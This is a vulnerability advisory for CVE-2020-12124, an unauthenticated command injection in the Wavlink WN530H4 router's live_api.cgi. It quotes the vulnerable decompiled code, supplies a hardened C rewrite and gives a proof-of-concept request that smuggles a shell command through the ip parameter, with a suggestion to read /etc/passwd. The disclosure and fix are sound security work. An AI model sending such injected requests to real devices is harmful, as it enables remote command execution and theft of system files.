
CVE-2020-12124

CVE-2020-12124 is a command line injection vulnerability in the Wavlink WN530H4 router.

The unauthenticated endpoint /cgi-bin/live_api.cgi contains a command line injection vulnerability that lets unauthenticated users execute arbitrary Linux shell commands.

The endpoint live_api.cgi accepts three parameters in a GET request: page, id, and ip. The ip parameter is the injection point. The program does not sanitize the ip parameter and passes its value unchanged into a command string that is then executed through the Linux system() call.

The following code demonstrates the vulnerability, located at address 0x400ac8 in the binary. This code is called if the page parameter is set to satellite_list.


/* page=satellite_list: the attacker-controlled ip parameter is formatted
   straight into a shell command string, which is then handed to system() */
sprintf(linux_command,"echo %s, > /tmp/satellite_list &",ip_var);
do_system(linux_command);

There is another code path that is taken when the page parameter is set to any other value. It triggers a similar command line injection, located at address 0x400d24 in the binary.


/* any other page value: the unsanitized ip parameter is formatted into a
   curl command that popen() runs through the shell; the command's output
   is then copied into the HTTP response, so the injection is not blind */
sprintf(linux_command,"curl -s -m 5 http://%s/mesh_get_extender.shtml",ip_var);
__stream = popen(linux_command,"r");
if (__stream != (FILE *)0x0) {
    while( true ) {
        pcVar2 = fgets(linux_command,0x80,__stream);
        if (pcVar2 == (char *)0x0) break;
        printf("%s",linux_command);   /* echo each line of command output to the page */
    }
    pclose(__stream);
    ...
}
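As an added example (not from the original post or the Wavlink firmware), this is how the second code path could be written so that the ip parameter can never reach a shell: the value is rejected unless it is a dotted-quad IPv4 literal, and curl is executed directly with an argv instead of through popen(). The function names and the 15-character length limit are assumptions made for this example.

```c
#include <arpa/inet.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Return 1 only if s is a dotted-quad IPv4 literal. inet_pton() rejects
 * shell metacharacters, whitespace and anything else that is not an address,
 * so a value such as "; touch /tmp/hacked;" never gets past this check. */
int is_valid_ipv4(const char *s) {
    struct in_addr addr;
    if (s == NULL || strlen(s) > 15) return 0;   /* assumed max length of "255.255.255.255" */
    return inet_pton(AF_INET, s, &addr) == 1;
}

/* Hardened replacement (hypothetical name) for popen("curl ... http://%s/..."):
 * the URL is built with a bounded snprintf from an already-validated address and
 * curl is exec'd with a fixed argv, so no shell parses attacker-controlled text.
 * Copies curl's stdout to `out`. Returns 0 on success, -1 on rejection or error. */
int fetch_extender_page(const char *ip, FILE *out) {
    char url[64];
    int fds[2], status;
    if (!is_valid_ipv4(ip)) return -1;
    snprintf(url, sizeof url, "http://%s/mesh_get_extender.shtml", ip);
    if (pipe(fds) != 0) return -1;
    pid_t pid = fork();
    if (pid < 0) { close(fds[0]); close(fds[1]); return -1; }
    if (pid == 0) {                       /* child: stdout -> pipe, then exec curl */
        dup2(fds[1], STDOUT_FILENO);
        close(fds[0]); close(fds[1]);
        execlp("curl", "curl", "-s", "-m", "5", url, (char *)NULL);
        _exit(127);                       /* exec failed */
    }
    close(fds[1]);                        /* parent: relay curl's output */
    char buf[128];
    ssize_t n;
    while ((n = read(fds[0], buf, sizeof buf)) > 0) fwrite(buf, 1, (size_t)n, out);
    close(fds[0]);
    waitpid(pid, &status, 0);
    return 0;
}
```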

Armed with this knowledge, an attacker can send a specially crafted web request like the one shown below.


$ curl /cgi-bin/live_api.cgi?page=abc&id=173&ip=;%20touch%20/tmp/hacked;

This command line injection is not blind: the attacker can inspect the source of the resulting page to retrieve the command output. For instance, if the command is set to cat /etc/passwd we can see how damaging this vulnerability really is.

[Screenshot: Command Line Injection]

For more information and vulnerability analysis, please see my report on the WAVLINK WN530H4.